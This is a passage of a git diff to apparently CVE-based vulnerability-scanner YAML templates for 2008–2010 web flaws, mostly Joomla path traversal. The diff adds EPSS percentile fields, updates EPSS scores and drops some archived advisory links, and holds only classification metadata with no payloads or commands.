+ epss-percentile: 0.81093
metadata:
max-request: 1
vendor: wordpress
diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml
index e290bc9c53..ce8f0401d5 100644
--- a/http/cves/2008/CVE-2008-1547.yaml
+++ b/http/cves/2008/CVE-2008-1547.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-601
epss-score: 0.03523
cpe: cpe:2.3:a:microsoft:exchange_server:2003:sp2:*:*:*:*:*:*
+ epss-percentile: 0.90347
metadata:
max-request: 2
shodan-query: http.title:"Outlook"
diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml
index b214ef291f..e4f502305f 100644
--- a/http/cves/2008/CVE-2008-2398.yaml
+++ b/http/cves/2008/CVE-2008-2398.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00329
cpe: cpe:2.3:a:appserv_open_project:appserv:*:*:*:*:*:*:*:*
+ epss-percentile: 0.67268
metadata:
max-request: 1
vendor: appserv_open_project
diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml
index 22c20eea92..93e9e2ef93 100644
--- a/http/cves/2008/CVE-2008-2650.yaml
+++ b/http/cves/2008/CVE-2008-2650.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.06344
cpe: cpe:2.3:a:cmsimple:cmsimple:3.1:*:*:*:*:*:*:*
+ epss-percentile: 0.92723
metadata:
max-request: 1
vendor: cmsimple
diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml
index 1a768681fa..f4be6b963b 100644
--- a/http/cves/2008/CVE-2008-4668.yaml
+++ b/http/cves/2008/CVE-2008-4668.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01018
cpe: cpe:2.3:a:joomla:com_imagebrowser:0.1.5:*:*:*:*:*:*:*
+ epss-percentile: 0.819
metadata:
max-request: 1
vendor: joomla
diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml
index fc77b5f39e..f779f0c467 100644
--- a/http/cves/2008/CVE-2008-4764.yaml
+++ b/http/cves/2008/CVE-2008-4764.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00779
cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:*
+ epss-percentile: 0.79142
metadata:
max-request: 1
vendor: extplorer
diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml
index 8d2bbdc149..cb3f00ca3f 100644
--- a/http/cves/2008/CVE-2008-5587.yaml
+++ b/http/cves/2008/CVE-2008-5587.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.02331
cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:*
+ epss-percentile: 0.88339
metadata:
max-request: 1
shodan-query: http.title:"phpPgAdmin"
diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml
index 16ef73ee8d..9b258f4b89 100644
--- a/http/cves/2008/CVE-2008-6080.yaml
+++ b/http/cves/2008/CVE-2008-6080.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 5
cve-id: CVE-2008-6080
cwe-id: CWE-22
- epss-score: 0.00548
+ epss-score: 0.00666
cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:*
+ epss-percentile: 0.77115
metadata:
max-request: 1
vendor: codecall
diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml
index 296a03faed..f5a62ff742 100644
--- a/http/cves/2008/CVE-2008-6172.yaml
+++ b/http/cves/2008/CVE-2008-6172.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.8
cve-id: CVE-2008-6172
cwe-id: CWE-22
- epss-score: 0.00367
+ epss-score: 0.00447
cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:*
+ epss-percentile: 0.71823
metadata:
max-request: 1
vendor: weberr
diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml
index 65cc03071a..cd116f6329 100644
--- a/http/cves/2008/CVE-2008-6222.yaml
+++ b/http/cves/2008/CVE-2008-6222.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 5
cve-id: CVE-2008-6222
cwe-id: CWE-22
- epss-score: 0.00684
+ epss-score: 0.00832
cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.79864
metadata:
max-request: 1
vendor: joomlashowroom
diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml
index defd3ee5c7..c5972dd42c 100644
--- a/http/cves/2008/CVE-2008-6465.yaml
+++ b/http/cves/2008/CVE-2008-6465.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00421
cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:*
+ epss-percentile: 0.70992
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml
index 6015b4e93e..bae7db8b1d 100644
--- a/http/cves/2008/CVE-2008-6668.yaml
+++ b/http/cves/2008/CVE-2008-6668.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00359
cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:*
+ epss-percentile: 0.68648
metadata:
max-request: 2
vendor: dirk_bartley
diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml
index e7c725f794..c145905ac5 100644
--- a/http/cves/2008/CVE-2008-6982.yaml
+++ b/http/cves/2008/CVE-2008-6982.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0038
cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:*
+ epss-percentile: 0.69519
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml
index 2a8fc8c9c3..b6eca282e8 100644
--- a/http/cves/2008/CVE-2008-7269.yaml
+++ b/http/cves/2008/CVE-2008-7269.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 5.8
cve-id: CVE-2008-7269
cwe-id: CWE-20
- epss-score: 0.03645
+ epss-score: 0.01358
cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:*
+ epss-percentile: 0.84524
metadata:
max-request: 1
shodan-query: html:"SiteEngine"
diff --git a/http/cves/2009/CVE-2009-0347.yaml b/http/cves/2009/CVE-2009-0347.yaml
index dfce9670b5..f1add98dc1 100644
--- a/http/cves/2009/CVE-2009-0347.yaml
+++ b/http/cves/2009/CVE-2009-0347.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 5.8
cve-id: CVE-2009-0347
cwe-id: CWE-59
- epss-score: 0.08272
+ epss-score: 0.09851
cpe: cpe:2.3:a:autonomy:ultraseek:_nil_:*:*:*:*:*:*:*
+ epss-percentile: 0.94077
metadata:
max-request: 1
vendor: autonomy
diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml
index ba3b74a6ea..52a6e5fe70 100644
--- a/http/cves/2009/CVE-2009-0545.yaml
+++ b/http/cves/2009/CVE-2009-0545.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-20
epss-score: 0.9719
cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:*
+ epss-percentile: 0.99722
metadata:
max-request: 1
vendor: zeroshell
diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml
index 14eae6c598..4a287f995e 100644
--- a/http/cves/2009/CVE-2009-0932.yaml
+++ b/http/cves/2009/CVE-2009-0932.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.04048
cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:*
+ epss-percentile: 0.9095
metadata:
max-request: 1
vendor: debian
diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml
index 7aa75206ad..b8fda8bbff 100644
--- a/http/cves/2009/CVE-2009-1151.yaml
+++ b/http/cves/2009/CVE-2009-1151.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-94
epss-score: 0.79256
cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9785
metadata:
max-request: 1
vendor: phpmyadmin
diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml
index 7529af81a6..2a28afbc6c 100644
--- a/http/cves/2009/CVE-2009-1496.yaml
+++ b/http/cves/2009/CVE-2009-1496.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00533
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
+ epss-percentile: 0.7415
metadata:
max-request: 1
vendor: joomla
diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml
index 1252fd6466..26800f31ff 100644
--- a/http/cves/2009/CVE-2009-1558.yaml
+++ b/http/cves/2009/CVE-2009-1558.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00901
cpe: cpe:2.3:h:cisco:wvc54gca:1.00r22:*:*:*:*:*:*:*
+ epss-percentile: 0.80705
metadata:
max-request: 1
vendor: cisco
diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml
index 7d94fa369a..8d7ce456af 100644
--- a/http/cves/2009/CVE-2009-1872.yaml
+++ b/http/cves/2009/CVE-2009-1872.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.3657
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96635
metadata:
max-request: 1
shodan-query: http.component:"Adobe ColdFusion"
diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml
index 6b84b86d27..6d39f72fa9 100644
--- a/http/cves/2009/CVE-2009-2015.yaml
+++ b/http/cves/2009/CVE-2009-2015.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00813
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
+ epss-percentile: 0.79614
metadata:
max-request: 1
vendor: joomla
diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml
index 1c3fa42ae0..7fa974b22c 100644
--- a/http/cves/2009/CVE-2009-2100.yaml
+++ b/http/cves/2009/CVE-2009-2100.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00528
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
+ epss-percentile: 0.74045
metadata:
max-request: 1
vendor: joomla
diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml
index 41261d1df7..1652ecc119 100644
--- a/http/cves/2009/CVE-2009-3053.yaml
+++ b/http/cves/2009/CVE-2009-3053.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00367
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
+ epss-percentile: 0.69025
metadata:
max-request: 1
vendor: joomla
diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml
index 69a50e0646..c4a7650b54 100644
--- a/http/cves/2009/CVE-2009-3318.yaml
+++ b/http/cves/2009/CVE-2009-3318.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00706
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
+ epss-percentile: 0.77913
metadata:
max-request: 1
vendor: joomla
diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml
index a0fca2b616..e1016994ea 100644
--- a/http/cves/2009/CVE-2009-4202.yaml
+++ b/http/cves/2009/CVE-2009-4202.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01956
cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:*
+ epss-percentile: 0.87217
metadata:
max-request: 1
vendor: joomla
diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml
index 72142f903b..5052031710 100644
--- a/http/cves/2009/CVE-2009-4223.yaml
+++ b/http/cves/2009/CVE-2009-4223.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-94
epss-score: 0.01041
cpe: cpe:2.3:a:gianni_tommasi:kr-php_web_content_server:*:beta_2:*:*:*:*:*:*
+ epss-percentile: 0.82106
metadata:
max-request: 1
vendor: gianni_tommasi
diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml
index db07ceb35c..5104703c40 100644
--- a/http/cves/2009/CVE-2009-4679.yaml
+++ b/http/cves/2009/CVE-2009-4679.yaml
@@ -9,7 +9,6 @@ info:
reference:
- https://www.exploit-db.com/exploits/33440
- https://nvd.nist.gov/vuln/detail/CVE-2009-4679
- - http://web.archive.org/web/20140722130146/http://secunia.com/advisories/37760/
- http://www.exploit-db.com/exploits/10754
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
@@ -18,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00826
cpe: cpe:2.3:a:inertialfate:com_if_nexus:1.5:*:*:*:*:*:*:*
+ epss-percentile: 0.79783
metadata:
max-request: 1
vendor: inertialfate
diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml
index b544b386e4..ee6ca70805 100644
--- a/http/cves/2009/CVE-2009-5020.yaml
+++ b/http/cves/2009/CVE-2009-5020.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-20
epss-score: 0.00215
cpe: cpe:2.3:a:awstats:awstats:*:*:*:*:*:*:*:*
+ epss-percentile: 0.58808
metadata:
max-request: 2
vendor: awstats
diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml
index 94bc2f0b89..c4ce006a35 100644
--- a/http/cves/2009/CVE-2009-5114.yaml
+++ b/http/cves/2009/CVE-2009-5114.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.03309
cpe: cpe:2.3:a:iwork:webglimpse:*:*:*:*:*:*:*:*
+ epss-percentile: 0.90068
metadata:
max-request: 1
vendor: iwork
diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml
index 3a946db7fa..eda20a81c4 100644
--- a/http/cves/2010/CVE-2010-0157.yaml
+++ b/http/cves/2010/CVE-2010-0157.yaml
@@ -8,7 +8,6 @@ info:
reference:
- https://www.exploit-db.com/exploits/10943
- https://nvd.nist.gov/vuln/detail/CVE-2010-0157
- - http://web.archive.org/web/20151023032409/http://secunia.com/advisories/37896/
- http://packetstormsecurity.org/1001-exploits/joomlabiblestudy-lfi.txt
remediation: Upgrade to a supported version.
classification:
@@ -18,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00826
cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:*
+ epss-percentile: 0.79783
metadata:
max-request: 1
vendor: joomla
diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml
index ae453080bf..6f0a9bd55e 100644
--- a/http/cves/2010/CVE-2010-0219.yaml
+++ b/http/cves/2010/CVE-2010-0219.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 10
cve-id: CVE-2010-0219
cwe-id: CWE-255
- epss-score: 0.97497
+ epss-score: 0.97513
cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:*
+ epss-percentile: 0.99971
metadata:
max-request: 2
shodan-query: http.html:"Apache Axis"
diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml
index ef613e1a62..bcd75ba059 100644
--- a/http/cves/2010/CVE-2010-0467.yaml
+++ b/http/cves/2010/CVE-2010-0467.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.0586
cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:*
+ epss-percentile: 0.92444
metadata:
max-request: 1
vendor: chillcreations
diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml
index 87dc67e493..28e76eca65 100644
--- a/http/cves/2010/CVE-2010-0696.yaml
+++ b/http/cves/2010/CVE-2010-0696.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.79015
cpe: cpe:2.3:a:joomlaworks:jw_allvideos:3.0:*:*:*:*:*:*:*
+ epss-percentile: 0.97844
metadata:
max-request: 1
vendor: joomlaworks
diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml
index 68d8a5149c..ab8215fc97 100644
--- a/http/cves/2010/CVE-2010-0759.yaml
+++ b/http/cves/2010/CVE-2010-0759.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01326
cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:*
+ epss-percentile: 0.84334
metadata:
max-request: 1
vendor: greatjoomla
diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml
index 3ae5c45be1..b85b9eb83a 100644
--- a/http/cves/2010/CVE-2010-0942.yaml
+++ b/http/cves/2010/CVE-2010-0942.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00477
cpe: cpe:2.3:a:jvideodirect:com_jvideodirect:*:*:*:*:*:*:*:*
+ epss-percentile: 0.72681
metadata:
max-request: 1
vendor: jvideodirect
diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml
index deed2da1ad..b7b1f53746 100644
--- a/http/cves/2010/CVE-2010-0943.yaml
+++ b/http/cves/2010/CVE-2010-0943.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01155
cpe: cpe:2.3:a:joomlart:com_jashowcase:*:*:*:*:*:*:*:*
+ epss-percentile: 0.8306
metadata:
max-request: 1
vendor: joomlart
diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml
index b021b60f4d..8d90247b5c 100644
--- a/http/cves/2010/CVE-2010-0944.yaml
+++ b/http/cves/2010/CVE-2010-0944.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00477
cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:*
+ epss-percentile: 0.72681
metadata:
max-request: 1
vendor: thorsten_riess
diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml
index e984dbb1c8..4ac36c9526 100644
--- a/http/cves/2010/CVE-2010-0972.yaml
+++ b/http/cves/2010/CVE-2010-0972.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00813
cpe: cpe:2.3:a:g4j.laoneo:com_gcalendar:2.1.5:*:*:*:*:*:*:*
+ epss-percentile: 0.79614
metadata:
max-request: 1
vendor: g4j.laoneo
diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml
index 5924a8783f..b1a147a542 100644
--- a/http/cves/2010/CVE-2010-0982.yaml
+++ b/http/cves/2010/CVE-2010-0982.yaml
@@ -8,8 +8,6 @@ info:
reference:
- https://www.exploit-db.com/exploits/10942
- https://nvd.nist.gov/vuln/detail/CVE-2010-0982
- - http://web.archive.org/web/20210121193625/https://www.securityfocus.com/bid/37581/
- - http://web.archive.org/web/20151104182451/http://secunia.com/advisories/37917/
remediation: Apply all relevant security patches and product upgrades.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
@@ -18,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.0087
cpe: cpe:2.3:a:joomlamo:com_cartweberp:1.56.75:*:*:*:*:*:*:*
+ epss-percentile: 0.80286
metadata:
max-request: 1
vendor: joomlamo
diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml
index 28ef19e752..59f6badc38 100644
--- a/http/cves/2010/CVE-2010-0985.yaml
+++ b/http/cves/2010/CVE-2010-0985.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01222
cpe: cpe:2.3:a:chris_simon:com_abbrev:1.1:*:*:*:*:*:*:*
+ epss-percentile: 0.83609
metadata:
max-request: 1
vendor: chris_simon
diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml
index 170dbc29c1..ac622ba08b 100644
--- a/http/cves/2010/CVE-2010-1056.yaml
+++ b/http/cves/2010/CVE-2010-1056.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.06484
cpe: cpe:2.3:a:rockettheme:com_rokdownloads:*:*:*:*:*:*:*:*
+ epss-percentile: 0.92801
metadata:
max-request: 1
vendor: rockettheme
diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml
index 527b35c0d2..ff16e60b4a 100644
--- a/http/cves/2010/CVE-2010-1081.yaml
+++ b/http/cves/2010/CVE-2010-1081.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.02282
cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:*
+ epss-percentile: 0.88237
metadata:
max-request: 1
vendor: corejoomla
diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml
index b7833be0f6..0d5e24027d 100644
--- a/http/cves/2010/CVE-2010-1217.yaml
+++ b/http/cves/2010/CVE-2010-1217.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01155
cpe: cpe:2.3:a:je_form_creator:je_form_creator:*:*:*:*:*:*:*:*
+ epss-percentile: 0.8306
metadata:
max-request: 1
vendor: je_form_creator
diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml
index 78bef0b5cb..0d53aecfd1 100644
--- a/http/cves/2010/CVE-2010-1219.yaml
+++ b/http/cves/2010/CVE-2010-1219.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00813
cpe: cpe:2.3:a:com_janews:com_janews:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.79614
metadata:
max-request: 1
vendor: com_janews
diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml
index fdac5d99dc..6042d130fb 100644
--- a/http/cves/2010/CVE-2010-1302.yaml
+++ b/http/cves/2010/CVE-2010-1302.yaml
@@ -8,8 +8,6 @@ info:
reference:
- https://www.exploit-db.com/exploits/11978
- https://nvd.nist.gov/vuln/detail/CVE-2010-1302
- - http://web.archive.org/web/20210121195144/https://www.securityfocus.com/bid/39108/
- - http://web.archive.org/web/20140805062036/http://secunia.com/advisories/39200/
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
@@ -18,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01204
cpe: cpe:2.3:a:decryptweb:com_dwgraphs:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.83479
metadata:
max-request: 1
vendor: decryptweb
diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml
index 64a95367bf..2a74ba40c0 100644
--- a/http/cves/2010/CVE-2010-1304.yaml
+++ b/http/cves/2010/CVE-2010-1304.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.0045
cpe: cpe:2.3:a:joomlamo:com_userstatus:1.21.16:*:*:*:*:*:*:*
+ epss-percentile: 0.71928
metadata:
max-request: 1
vendor: joomlamo
diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml
index 425d3d289c..834fd8fc16 100644
--- a/http/cves/2010/CVE-2010-1305.yaml
+++ b/http/cves/2010/CVE-2010-1305.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.03203
cpe: cpe:2.3:a:joomlamo:com_jinventory:1.23.02:*:*:*:*:*:*:*
+ epss-percentile: 0.89919
metadata:
max-request: 1
vendor: joomlamo
diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml
index 011e567332..43ddb17e35 100644
--- a/http/cves/2010/CVE-2010-1306.yaml
+++ b/http/cves/2010/CVE-2010-1306.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01242
cpe: cpe:2.3:a:roberto_aloi:com_joomlapicasa2:2.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.83796
metadata:
max-request: 1
vendor: roberto_aloi
diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml
index c080141c9e..364695dd94 100644
--- a/http/cves/2010/CVE-2010-1307.yaml
+++ b/http/cves/2010/CVE-2010-1307.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01751
cpe: cpe:2.3:a:software.realtyna:com_joomlaupdater:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.86395
metadata:
max-request: 1
vendor: software.realtyna
diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml
index 2b15bb83e4..df94e58133 100644
--- a/http/cves/2010/CVE-2010-1308.yaml
+++ b/http/cves/2010/CVE-2010-1308.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01334
cpe: cpe:2.3:a:la-souris-verte:com_svmap:1.1.1:*:*:*:*:*:*:*
+ epss-percentile: 0.84366
metadata:
max-request: 1
vendor: la-souris-verte
diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml
index 83ac573be6..7dbcb66435 100644
--- a/http/cves/2010/CVE-2010-1312.yaml
+++ b/http/cves/2010/CVE-2010-1312.yaml
@@ -8,7 +8,6 @@ info:
reference:
- https://www.exploit-db.com/exploits/12077
- https://nvd.nist.gov/vuln/detail/CVE-2010-1312
- - http://web.archive.org/web/20140724200344/http://secunia.com/advisories/39289/
- http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt
remediation: Upgrade to a supported version.
classification:
@@ -18,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01155
cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:*
+ epss-percentile: 0.8306
metadata:
max-request: 1
vendor: ijoomla
diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml
index f0ef6c2a34..42dfb4018b 100644
--- a/http/cves/2010/CVE-2010-1313.yaml
+++ b/http/cves/2010/CVE-2010-1313.yaml
@@ -8,7 +8,6 @@ info:
reference:
- https://www.exploit-db.com/exploits/12082
- https://nvd.nist.gov/vuln/detail/CVE-2010-1313
- - http://web.archive.org/web/20210121195302/https://www.securityfocus.com/bid/39237/
- http://www.exploit-db.com/exploits/12082
remediation: Upgrade to a supported version.
classification:
@@ -18,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.0045
cpe: cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:*
+ epss-percentile: 0.71928
metadata:
max-request: 1
vendor: seber
diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml
index cc92a0b209..b74928bff0 100644
--- a/http/cves/2010/CVE-2010-1314.yaml
+++ b/http/cves/2010/CVE-2010-1314.yaml
@@ -8,7 +8,6 @@ info:
reference:
- https://www.exploit-db.com/exploits/12086
- https://nvd.nist.gov/vuln/detail/CVE-2010-1314
- - http://web.archive.org/web/20140724203458/http://secunia.com/advisories/39359/
- http://packetstormsecurity.org/1004-exploits/joomlahsconfig-lfi.txt
remediation: Upgrade to a supported version.
classification:
@@ -18,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00477
cpe: cpe:2.3:a:joomlanook:com_hsconfig:1.5:*:*:*:*:*:*:*
+ epss-percentile: 0.72681
metadata:
max-request: 1
vendor: joomlanook
diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml
index 8c951f9e6f..356f274fdb 100644
--- a/http/cves/2010/CVE-2010-1315.yaml
+++ b/http/cves/2010/CVE-2010-1315.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.0087
cpe: cpe:2.3:a:joomlamo:com_weberpcustomer:1.2.1:*:*:*:*:*:*:*
+ epss-percentile: 0.80286
metadata:
max-request: 1
vendor: joomlamo
diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml
